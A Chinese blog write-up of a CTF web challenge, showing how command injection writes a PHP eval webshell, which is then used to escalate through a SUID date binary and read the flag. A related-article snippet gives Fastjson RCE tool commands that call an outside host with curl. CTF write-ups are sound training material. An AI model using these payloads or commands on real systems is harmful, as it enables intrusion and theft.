【NewStarCTF】So Baby RCE Again

最新推荐文章于 2024-04-17 22:25:00 发布
最新推荐文章于 2024-04-17 22:25:00 发布
阅读量913 收藏 3
点赞数 1
分类专栏: CTF题目笔记 文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52116519/article/details/127499896
版权

文章目录

考点

SUID提权

源码

在这里插入图片描述

shell_exec() 通过 shell 执行命令并将完整的输出以字符串的方式返回

步骤
  1. 写马,将11111<?php @eval($_POST[1])?>打印到文件webshell.php
    ?cmd=echo '11111<?php @eval($_POST[1])?>' > webshell.php
  2. 访问/webshell.php,写入成功
    在这里插入图片描述
  3. 蚁剑连接
    在这里插入图片描述
  4. 找到疑似flag文件
    在这里插入图片描述
  5. 读不出来
    在这里插入图片描述
  6. 发现权限不够
    在这里插入图片描述
  7. 查看文件权限
    在这里插入图片描述
  8. 找到正在系统上运行的所有SUID可执行文件,发现/bin/date有s权限
    在这里插入图片描述
  9. 利用date命令读取文件,date -f 文件名
    在这里插入图片描述
c4fx
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
NewStarCTF week5 web 部分题解
qq_60829702的博客
10-23 517
[NewStarCTF] Give me your photo PLZ、Unsafe Apache、So Baby RCE Again、BabySSTI_Three解题记录以及心得体会
NewStarCTF 公开赛赛道 week5|web wp
m0_64815693的博客
10-23 2742
NewStarCTF 公开赛赛道 第五周 web wp
NewStar CTF Week3Misc 4-5Web
weixin_63231007的博客
12-05 876
目录 Week-3 Misc(1) Whats HTTP(2) qsdz's girlfriend 3(3) WebShell!(4) 混沌的图像 Week-4 Web(1) So Baby RCE(%0A进行rce rev|sort读取flag)(2) UnserializeThree(%0d换行rce) week5-web(1) Give me your photo PLZ(.htaccess配置文件漏洞)(2) Unsafe Apache(CVE-2021-42013)(3) So
NewStarCTF 公开赛 第四周 学习记录
m0_64815693的博客
10-16 2141
NewStarCTF 公开赛赛道 web wp
NewStarCTF2022-Week4-Web
bossDDYY的博客
10-18 1051
**写在前面**:本人小白,文章有什么错误,欢迎各位师傅指点 本文有些地方借鉴Pysnow师傅的wp[Pysnow师傅的wp](https://pysnow.cn/archives/453/) # So Baby RCE > 考点:空格绕过、关键字符绕过、斜杠绕过 ## 分析 打开题目,发现直接给的源码 ```php
向日葵RCE漏洞一键批量自己检测工具
02-25
【标题】:“向日葵RCE漏洞一键批量自我检测工具” 在网络安全领域,"RCE"是"Remote Code Execution"的缩写,意为远程代码执行。这是一个非常严重的安全漏洞,允许攻击者在目标系统上执行任意代码,从而获得与系统...
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
Apache-druid-kafka-rce.yaml
最新发布
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
phpstudy_rce.py
10-11
phpstudy_rce
NewStarCTF 2022 web方向题解 wp
Jay17的博客
08-29 2639
NewStarCTF 2022 web方向题解 wp
BUUCTF NewStarCTF 公开赛赛道Week5 Writeup
末初的CSDN博客
10-24 2075
简单的盲注流量分析当响应包的长度>765时,该条查询语句正确,tshark导出查询语句和查询正确的判断条件(包长度)Python简单处理。
【Web】NewStarCTF 2022 题解(全)
uuzeray的博客
04-17 1248
响应头进行Set-Cookie,显然一个base64编码,所以打入的时候也要base64encode一下。对关键词有过滤,无法大小写绕过,测出select,update,insert和union都被ban了。之前刷NSSRound赛的时候多次碰到Apache/2.4.49的RCE漏洞,这题也是现搜就完了。访问/upload/base64yjh.png,连蚁剑,读/flag。主要是空格的处理,/**/和/*关键字*/都被ban了,可以用%0c。抓包,看响应头,看到是Apache/2.4.50。
newstarctf web week5
qq_63548648的博客
10-23 1104
newstarctf web week5
[SWPUCTF 2021 新生赛]babyrce
qq_62046696的博客
05-10 2266
打开界面看见if选项admin=1果断想到用burp抓包然后cookie给admin=1,获取下一步指令 然后url访问, <?php error_reporting(0); highlight_file(__FILE__); error_reporting(0); if(isset($_GET['url'])){ $ip=$_GET['url']; if(preg_match("//",$ip)){ die('nonono'); } $a=shel...
NewStarCTF|WEEK5|WEB
weixin_63016174的博客
10-23 402
CTF比赛
攻防世界——web高手进阶区题解
小锤队长的博客
10-01 2万+
目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞) 3,ics-06(爆破id) 4,lottery(.git文件泄露) 5,NewsCenter(sql注入) 6,mfv(.git文件泄露 + php审计+ 命令执行) 7,Training-WWW-Robots(robo...
2021年HECTF部分Writeup
热门推荐
qq_42815161的博客
11-17 3万+
摸了一天鱼运气好混了个奖orz Misc 快来公众号ya 关注公众号发送flag JamesHarden 查看内码发现PK头,改后缀名.zip解压,打开JamesHarden.class后发现字符串URPGS{Jr1p0zr_G0_U3pg6_!}ROT13后得到HECTF{We1c0me_T0_H3ct6_!} ...
NewStar BabySSTI_One【web系列】
shutTD的博客
10-04 736
ssti类型的题首先就是找注入点,其次判断为什么类型的注入,最后通过替换关键词和字符串拼接等等达到绕过waf的目的,不过这类题的姿势还是很多的需要我们在练习的过程中不断积累。
fastjson rce
09-16
Fastjson RCE(Remote Code Execution)是指在使用Fastjson这个Java库时,存在远程代码执行的风险。在Fastjson版本1.2.24及以下的版本中,存在RCE问题。这个问题是由于Fastjson引入了AutoType特性,但在安全方面的考虑不够周全,导致攻击者可以通过构造恶意的JSON数据来执行任意的Java代码,从而实现远程代码执行。 为了利用Fastjson RCE问题,攻击者可以使用一些工具,比如fastjson_tool.jar。通过执行类似以下命令来利用Fastjson RCE问题: ``` java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 ``` 以上命令中,HRMIServer和HLDAPServer是Fastjson工具提供的两种利用方式,它们可以远程执行指定的代码,包括通过curl命令发送HTTP请求。 值得注意的是,Fastjson RCE问题只存在于版本1.2.24及以下,因此建议使用最新版本的Fastjson以避免此安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值